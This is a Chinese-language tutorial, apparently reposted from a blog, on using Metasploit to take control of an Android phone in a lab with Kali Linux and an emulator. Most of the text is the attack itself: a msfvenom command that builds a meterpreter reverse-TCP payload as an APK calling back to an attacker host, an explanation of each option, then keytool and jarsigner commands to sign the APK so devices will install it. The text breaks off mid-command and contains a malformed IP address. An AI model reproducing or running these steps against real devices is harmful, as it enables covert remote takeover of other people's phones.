如何使用Metasploit对安卓手机进行控制
在這次的實驗中,我會使用kali linux和安卓模擬器演示如何使用Metasploit框架控制Android設備。創建負載我們需要兩臺虛擬機:Kali Linux和安卓模擬器。 打開vm啟動Kali linux。接著打開終端,使用msfvenom制作android利用程序。Msfvenom是msfpayload和msfencode的組合。它是一個單一的工具。它有標準的命令行選項。 Msfvenom用來制造的有效載荷用來滲透Android模擬器。一旦打開終端提示符下輸入以下命令,使用msfvenom工具來創建有效載荷APK文件。msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apkp 設置要使用的payloadLHOST 設置用來接收反彈連接的主機LPORT 設置用來接收反彈連接的端口R 設置文件格式Location 要保存的文件位置這個命令執行完之后,你會看到一些錯誤,但不用擔心。現在可以到輸出目錄查看生成的apk了。我們已經成功創建了Android格式(APK)文件的有效載荷。現在一般Android的移動設備不允許安裝沒有適當簽名證書的應用程序。 Android設備只安裝帶有簽署文件的APK。我們可以使用如下工具進行手動簽名:l Keytool (已安裝)l jar signer (已安裝)l zipalign (需要安裝)執行下列命令簽名。首先使用密鑰工具創建密鑰庫。keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000`然后使用JARsigner簽名APKjarsigner -verbose -sigalg SHA1withRSA -digestalg SHA
總結
以上是生活随笔為你收集整理的如何使用Metasploit对安卓手机进行控制的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux服务器删除cdn,有惊无险的一
- 下一篇: 黑群晖安装重启后无法自动进入